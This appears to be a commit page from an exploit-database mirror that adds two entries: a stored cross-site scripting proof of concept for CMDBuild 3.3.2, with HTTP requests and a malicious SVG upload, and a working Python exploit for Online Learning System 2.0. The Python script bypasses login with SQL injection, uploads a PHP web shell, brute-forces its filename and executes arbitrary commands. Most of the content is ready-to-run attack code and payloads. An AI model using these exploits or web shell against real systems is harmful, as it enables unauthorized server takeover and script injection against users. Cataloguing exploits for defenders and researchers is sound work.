DB: 2021-11-17
2 changes to exploits/shellcodes Online Learning System 2.0 - Remote Code Execution (RCE) CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
This commit is contained in:
parent
412b034ee9
commit
11900b8459
3 changed files with 193 additions and 0 deletions
81
exploits/multiple/webapps/50527.txt
Normal file
81
exploits/multiple/webapps/50527.txt
Normal file
|
@ -0,0 +1,81 @@
|
|||
# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
|
||||
# Date: 15/11/2021
|
||||
# Exploit Author: Hosein Vita
|
||||
# Vendor Homepage: https://www.cmdbuild.org
|
||||
# Software Link: https://www.cmdbuild.org/en/download/latest-version
|
||||
# Version: CMDBuild 3.3.2
|
||||
# Tested on: Linux
|
||||
|
||||
Summary:
|
||||
|
||||
Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections
|
||||
|
||||
Proof of concepts :
|
||||
|
||||
Stored Xss Example:
|
||||
|
||||
1-Login to you'r Dashboard As a low privilege user
|
||||
2-Click On Basic archives and Employee
|
||||
3- +Add card Employee
|
||||
4- Enter your xss payload in parameters
|
||||
5-On added employee click on "Open Relation Graph"
|
||||
|
||||
POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
|
||||
...
|
||||
Cmdbuild-Actionid: class.card.new.open
|
||||
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
|
||||
|
||||
Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 302
|
||||
Connection: close
|
||||
|
||||
{"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
|
||||
|
||||
|
||||
------------------------------------------------------------------------
|
||||
|
||||
|
||||
File upload Xss example:
|
||||
|
||||
1-Click on Basic archives
|
||||
2-Click on Workplace - + Add card Workplace
|
||||
3-Select "attachments" icon - +Add attachment + image
|
||||
4-Upload your svg file with xss payload
|
||||
5-Click on preview and Right click open in new tab
|
||||
|
||||
|
||||
|
||||
Request:
|
||||
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
|
||||
Cmdbuild-Actionid: class.card.attachments.open
|
||||
|
||||
-----------------------------269319782833689825543405205260
|
||||
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
|
||||
Content-Type: image/svg+xml
|
||||
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
|
||||
width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
|
||||
xml:space="preserve">
|
||||
<ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/>
|
||||
<path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03
|
||||
c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341
|
||||
c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933
|
||||
c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991
|
||||
c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875
|
||||
c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489
|
||||
c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309
|
||||
c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876
|
||||
c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413
|
||||
c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566
|
||||
c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156
|
||||
c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351
|
||||
c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247
|
||||
c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331
|
||||
z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111
|
||||
C434.693,207.929,439.613,203.01,445.731,203.01z"/>
|
||||
<script>alert(1)</script>
|
||||
</svg>
|
110
exploits/php/webapps/50526.py
Executable file
110
exploits/php/webapps/50526.py
Executable file
|
@ -0,0 +1,110 @@
|
|||
# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
|
||||
# Date: 15/11/2021
|
||||
# Exploit Author: djebbaranon
|
||||
# Vendor Homepage: https://github.com/oretnom23
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
|
||||
# Version: 2.0
|
||||
# Tested on: Kali linux / Windows 10
|
||||
# CVE : CVE-2021-42580
|
||||
|
||||
#!/usr/bin/python3
|
||||
import os
|
||||
import time
|
||||
import argparse
|
||||
import requests
|
||||
import sys
|
||||
from colorama import init
|
||||
from colorama import Fore
|
||||
from colorama import Back
|
||||
from colorama import Style
|
||||
init(autoreset=True)
|
||||
def banner():
|
||||
print('''
|
||||
|
||||
_____ _ _ _ _ _____ ______ _____ _____
|
||||
| _ | | (_) | | (_) / __ \ | ___ / __ | ___|
|
||||
| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__
|
||||
| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __|
|
||||
\ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___
|
||||
\___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/
|
||||
__/ |
|
||||
|___/
|
||||
Written by djebbaranon
|
||||
twitter : @dj3bb4ran0n1
|
||||
zone-h : http://zone-h.org/archive/notifier=djebbaranon
|
||||
''')
|
||||
banner()
|
||||
def my_args():
|
||||
parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
|
||||
parser.add_argument("-u","--url",type=str,required=True,help="url of target")
|
||||
parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
|
||||
parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
|
||||
my_arguments = parser.parse_args()
|
||||
return my_arguments
|
||||
def login_with_sqli_login_bypass(user,passw):
|
||||
global session
|
||||
global url
|
||||
global cookies
|
||||
url = my_args().url
|
||||
session = requests.Session()
|
||||
data = {
|
||||
"username" : user,
|
||||
"password" : passw,
|
||||
}
|
||||
try:
|
||||
response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
|
||||
print( Fore.GREEN + "[+] Logged in succsusfully")
|
||||
cookies = response.cookies.get_dict()
|
||||
print("[+] your cookie : ")
|
||||
except requests.HTTPError as exception:
|
||||
print(Fore.RED + "[-] HTTP Error : {}".format(exception))
|
||||
sys.exit(1)
|
||||
login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
|
||||
def main(shell_name,renamed_shell):
|
||||
try:
|
||||
payload ={
|
||||
"id" : "",
|
||||
"faculty_id" : "test",
|
||||
"firstname" : "test",
|
||||
"lastname" : "test",
|
||||
"middlename" : "fsdfsd",
|
||||
"dob" : "2021-10-29",
|
||||
"gender": "Male",
|
||||
"department_id" : "1",
|
||||
"email" : "zebi@gmail.com",
|
||||
"contact" : "zebii",
|
||||
"address" : "zebii",
|
||||
}
|
||||
files = {
|
||||
"img" :
|
||||
(
|
||||
shell_name,
|
||||
"<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",
|
||||
"application/octet-stream",
|
||||
)
|
||||
}
|
||||
vunlerable_file = "/classes/Master.php?f=save_faculty"
|
||||
print("[*] Trying to upload webshell ....")
|
||||
response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)
|
||||
print("[+] trying to bruteforce the webshell ....")
|
||||
rangee = my_args().range
|
||||
for i in range(0,rangee):
|
||||
try:
|
||||
with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:
|
||||
if "nikmok" in response3.text and response3.status_code == 200:
|
||||
print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")
|
||||
break
|
||||
with open("shell.txt",mode="w+") as writer:
|
||||
writer.write(response3.url)
|
||||
else:
|
||||
print( Fore.RED + "[-] shell not found : " + response3.url)
|
||||
except requests.HTTPError as exception2:
|
||||
print("[-] HTTP Error : {0} ".format(exception2))
|
||||
except requests.HTTPError as error:
|
||||
print("[-] HTTP Error : ".format(error))
|
||||
command = my_args().command
|
||||
with requests.get(response3.url.replace("whoami",command)) as response4:
|
||||
print("[*] Executing {} ....".format(command))
|
||||
time.sleep(3)
|
||||
print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)
|
||||
main("hackerman.php","")
|
|
@ -44622,3 +44622,5 @@ id,file,description,date,author,type,platform,port
|
|||
50523,exploits/php/webapps/50523.txt,"Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
|
||||
50524,exploits/php/webapps/50524.txt,"WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Mohammed Aadhil Ashfaq",webapps,php,
|
||||
50525,exploits/php/webapps/50525.txt,"PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)",1970-01-01,"Hosein Vita",webapps,php,
|
||||
50526,exploits/php/webapps/50526.py,"Online Learning System 2.0 - Remote Code Execution (RCE)",1970-01-01,djebbaranon,webapps,php,
|
||||
50527,exploits/multiple/webapps/50527.txt,"CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue